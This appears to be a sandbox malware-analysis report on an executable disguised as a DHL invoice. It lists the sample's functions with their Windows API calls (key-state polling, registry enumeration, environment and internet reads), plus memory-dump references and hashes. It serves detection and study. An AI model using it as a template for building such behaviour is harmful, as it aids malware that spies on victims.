Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048CA68
Part of subcall function 0048C998: _wcslen.LIBCMT ref: 0048CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0048BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0048BB63
RegCloseKey.ADVAPI32(?,?), ref: 0048BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0048BBB3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: ceacbbcad2e4a5d2eb6636eafa7dd984fa30c071b71a42c25ca71737bd75d141
Instruction ID: bbc1d49f96498461f84a1a740cbd438427599bca2e1a62366f813ffdbb4a339f
Opcode Fuzzy Hash: ceacbbcad2e4a5d2eb6636eafa7dd984fa30c071b71a42c25ca71737bd75d141
Instruction Fuzzy Hash: FE619431208241AFD714EF24C490E2BBBE5FF84348F54896EF4954B2A2DB35ED45CB96

Function 00468BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00468BCD
VariantClear.OLEAUT32 ref: 00468C3E
VariantClear.OLEAUT32 ref: 00468C9D
VariantClear.OLEAUT32(?), ref: 00468D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00468D3B

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: c7c37afbe69f97956fb0d19e3569aca77d964282cb29c84af807d412189997f9
Instruction ID: fb2819b933547efb8b736eec217633f92c801ebe2c35394c71980d4cfd1bf812
Opcode Fuzzy Hash: c7c37afbe69f97956fb0d19e3569aca77d964282cb29c84af807d412189997f9
Instruction Fuzzy Hash: BC516CB5A00219EFCB10CF58D884AAAB7F4FF89314B15856AE905DB350E734E911CFA5

Function 00478AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00478BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00478BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00478C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00478C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00478C5F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 728680a72fa174cd7059497f7fed40c0db7ca31686114da75e079c42b1a6d8d3
Instruction ID: 4d3a7ff44322516b370283d61508f10edc917193a6e632f242b3c5bb2232e36f
Opcode Fuzzy Hash: 728680a72fa174cd7059497f7fed40c0db7ca31686114da75e079c42b1a6d8d3
Instruction Fuzzy Hash: B0515135A00215AFCB01DF55C885AAABBF5FF48318F04C46DE8496B3A2DB39ED41CB95

Function 00488EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00488F40
GetProcAddress.KERNEL32(00000000,?), ref: 00488FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00488FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00489032
FreeLibrary.KERNEL32(00000000), ref: 00489052

Part of subcall function 0041F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00471043,?,7735E610), ref: 0041F6E6
Part of subcall function 0041F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0045FA64,00000000,00000000,?,?,00471043,?,7735E610,?,0045FA64), ref: 0041F70D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 546b2b00c22c815be91eca14af110e08e7a0377f3c93c43b65a39d16e1c97e2b
Instruction ID: 47ad584446a521801eb7e26ec9ff8de19ac0ca89c07e0ae45e5f1aee28304d75
Opcode Fuzzy Hash: 546b2b00c22c815be91eca14af110e08e7a0377f3c93c43b65a39d16e1c97e2b
Instruction Fuzzy Hash: E8516335600205DFC711EF54C4848ADBBF1FF49318B4884AAE905AB362DB35ED86CF99

Function 00496B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00496C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00496C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00496C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0047AB79,00000000,00000000), ref: 00496C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00496CC7

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 2f03cd997b35680eb01586d1af4fe9623681f8ac33562b8ad328c65bcacae72e
Instruction ID: 12a0e0884739766fa0dfcc0b1bcbf13c14a553a95f9ce1c143211c00233c5ce9
Opcode Fuzzy Hash: 2f03cd997b35680eb01586d1af4fe9623681f8ac33562b8ad328c65bcacae72e
Instruction Fuzzy Hash: 7541A135604114AFDF24CF28CC98FA67FA5EB09350F16027AF999A73A0D375ED41CA58

Function 00432051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004320C3
_free.LIBCMT ref: 004320E3

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3890d703f7ea146fcb4efc749df72bd74b23163155a5f2f9b3b7e357d1c9b5e8
Instruction ID: 6dd859aa5b34bf1fef1704294b8be7e7265d224a6742f6dcd311402aa10f32ba
Opcode Fuzzy Hash: 3890d703f7ea146fcb4efc749df72bd74b23163155a5f2f9b3b7e357d1c9b5e8
Instruction Fuzzy Hash: 9A411372A00200AFCB24DF79CA80A5EB3F1EF88314F1541AEE615EB391D775AD01CB84

Function 0041912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00419141
ScreenToClient.USER32(00000000,?), ref: 0041915E
GetAsyncKeyState.USER32(00000001), ref: 00419183
GetAsyncKeyState.USER32(00000002), ref: 0041919D

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 1f4b99ddf7770994000e2e752fd0c50b56e37b570bdab3736163e39e4edf255d
Instruction ID: 4ec9162a1520e967818a38ef5d3125694897c688c06126800f407b15a9c0efab
Opcode Fuzzy Hash: 1f4b99ddf7770994000e2e752fd0c50b56e37b570bdab3736163e39e4edf255d
Instruction Fuzzy Hash: 97417071A0851ABBDF059F64D858BEEB774FB05324F20822BE825A33D1C7386D94CB55

Function 00473874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 004738CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00473922
TranslateMessage.USER32(?), ref: 0047394B
DispatchMessageW.USER32(?), ref: 00473955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00473966

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 1d263d90fd72d112a53c6766bf6d8848523db5564669c37401054b8c419d30da
Instruction ID: 84eaa786b2387123832bc19ae6b818a3c20a250c8b8cc06f73be85a0076670e9
Opcode Fuzzy Hash: 1d263d90fd72d112a53c6766bf6d8848523db5564669c37401054b8c419d30da
Instruction Fuzzy Hash: F831EAF0505341AEEB35DF349848BF737E49B15305F04857FE95A822A0D3B89685EB1A

Function 0047CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0047CF38
InternetReadFile.WININET(?,00000000,?,?), ref: 0047CF6F
GetLastError.KERNEL32(?,00000000,?,?,?,0047C21E,00000000), ref: 0047CFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,0047C21E,00000000), ref: 0047CFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,0047C21E,00000000), ref: 0047CFF2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 267ec784030a460f0f79f0dbc3477c0f95e7639c4a5d52a357bb912ea80ac7eb
Instruction ID: e2ddae2e016a7532fe7ae0336facecb5f043aa575c99eebf64ce95ba0d683efb
Opcode Fuzzy Hash: 267ec784030a460f0f79f0dbc3477c0f95e7639c4a5d52a357bb912ea80ac7eb
Instruction Fuzzy Hash: 59314F71500605EFDB20DFA5D8C49EBBBF9EB14354B10846FF50AD2281D738AE459B68

Function 00461901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00461915
PostMessageW.USER32(00000001,00000201,00000001), ref: 004619C1
Sleep.KERNEL32(00000000,?,?,?), ref: 004619C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 004619DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 004619E2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: afe3dbb1c1b5812c924d18584f98d9909dfe25e6880b22c06b7a4c40ae944cbe
Instruction ID: 829d82280daac0add66571c4e3e0d920b35c3f5cad5351cfb82f8dd034f1eba3
Opcode Fuzzy Hash: afe3dbb1c1b5812c924d18584f98d9909dfe25e6880b22c06b7a4c40ae944cbe
Instruction Fuzzy Hash: D331E0B1A00219EFCB00CFA8CD99ADE3BB5EB44314F04422AF921A72E0D3749D48CB95

Function 00495706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00495745
SendMessageW.USER32(?,00001074,?,00000001), ref: 0049579D
_wcslen.LIBCMT ref: 004957AF
_wcslen.LIBCMT ref: 004957BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 00495816

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: f224cb674ae0583935b1f03869fe9fea8b63ee289ff83acd55362933cbc49a42
Instruction ID: 6ec0d0b2a114a538478c386fa1c3cfc577435f3482bce6752ac6046d20e967aa
Opcode Fuzzy Hash: f224cb674ae0583935b1f03869fe9fea8b63ee289ff83acd55362933cbc49a42
Instruction Fuzzy Hash: CE21A7719046189ADF21DFA0DC84AEE7B78FF04724F204177F929DA280D7788A85CF58

Function 00480930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00480951
GetForegroundWindow.USER32 ref: 00480968
GetDC.USER32(00000000), ref: 004809A4
GetPixel.GDI32(00000000,?,00000003), ref: 004809B0
ReleaseDC.USER32(00000000,00000003), ref: 004809E8

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 195a483edd1dcdf039cd03fe6396345472f5f2d478cf678d7b6da44833dd45c7
Instruction ID: 11ced2f4e029b84405b50d312216b8a40d09f6c875fef5a9ce50f43728bdad74
Opcode Fuzzy Hash: 195a483edd1dcdf039cd03fe6396345472f5f2d478cf678d7b6da44833dd45c7
Instruction Fuzzy Hash: 1A21A175600204AFD714EF69C884EAEBBE5EF48704F00847EE84AA7362DB34AC04CB94

Function 0043CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0043CDC6
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0043CDE9

Part of subcall function 00433820: RtlAllocateHeap.NTDLL(00000000,?,004D1444,?,0041FDF5,?,?,0040A976,00000010,004D1440,004013FC,?,004013C6,?,00401129), ref: 00433852

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0043CE0F
_free.LIBCMT ref: 0043CE22
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0043CE31

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e06f20c93cc601861fa5ce633177da756fed3fc3e672f577b81ff098bf774a86
Instruction ID: 1197e6e1fe02c4a0703ab6cd5735b10ecee6a660b31c68c5b12b274b31b6dad2
Opcode Fuzzy Hash: e06f20c93cc601861fa5ce633177da756fed3fc3e672f577b81ff098bf774a86
Instruction Fuzzy Hash: AC01D8726012157F232126766CCED7B796DDECABA1715113FFD05E7201DA698D0182BC

Function 00419639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00419693
SelectObject.GDI32(?,00000000), ref: 004196A2
BeginPath.GDI32(?), ref: 004196B9
SelectObject.GDI32(?,00000000), ref: 004196E2

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: ff3afd791bfa64476153b784ca82cb3eb3b91a5e99644b880ad6adea22e2ed25
Instruction ID: 78f1d194d7aedd34a2b77dd1bb53a5becfdc778ea9d24743b2e18ad0daeb6eef
Opcode Fuzzy Hash: ff3afd791bfa64476153b784ca82cb3eb3b91a5e99644b880ad6adea22e2ed25
Instruction Fuzzy Hash: 6C213DB0902305EBDB119F64EC657EA3BA9BB50365F100277F810A62B1D3785C95CFAD

Function 00465711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00465726
_memcmp.LIBVCRUNTIME ref: 00465744
_memcmp.LIBVCRUNTIME ref: 00465757
_memcmp.LIBVCRUNTIME ref: 0046576F
_memcmp.LIBVCRUNTIME ref: 00465787

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b3e1830291eea80dcf21e65ab2d8b536b7e6a0cb8c488699daa5d9a5a3874387
Instruction ID: 87b03ce543656566d8abf010f9e260a5a793b331451bb8d5a0ee2648b4f9f092
Opcode Fuzzy Hash: b3e1830291eea80dcf21e65ab2d8b536b7e6a0cb8c488699daa5d9a5a3874387
Instruction Fuzzy Hash: 6601F971341615BBE60895119D42FBB734D9B313A9F504037FD04AAA41F72DED2582EE

Function 00432DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042F2DE,00433863,004D1444,?,0041FDF5,?,?,0040A976,00000010,004D1440,004013FC,?,004013C6), ref: 00432DFD
_free.LIBCMT ref: 00432E32
_free.LIBCMT ref: 00432E59
SetLastError.KERNEL32(00000000,00401129), ref: 00432E66
SetLastError.KERNEL32(00000000,00401129), ref: 00432E6F

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 1814151eca9aff72ff2c93c6ccbc5fcea9cb8c04b5e3c10e8124efd733df63a3
Instruction ID: c0694638e7792851092fa5cd03291216858c210ee132d495a6d0c21532e8c229
Opcode Fuzzy Hash: 1814151eca9aff72ff2c93c6ccbc5fcea9cb8c04b5e3c10e8124efd733df63a3
Instruction Fuzzy Hash: 8301F9762456006BD61227766E87E2B3559AFDD369F25203FF825A2292EEFC8C02506C

Function 0046000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?,?,?,0046035E), ref: 0046002B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?,?), ref: 00460046
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?,?), ref: 00460054
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?), ref: 00460064
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0045FF41,80070057,?,?), ref: 00460070

Memory Dump Source

Source File: 00000000.00000002.1435555268.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1435509846.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1435656075.00000000004C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1436989591.00000000004CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1437019108.00000000004D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

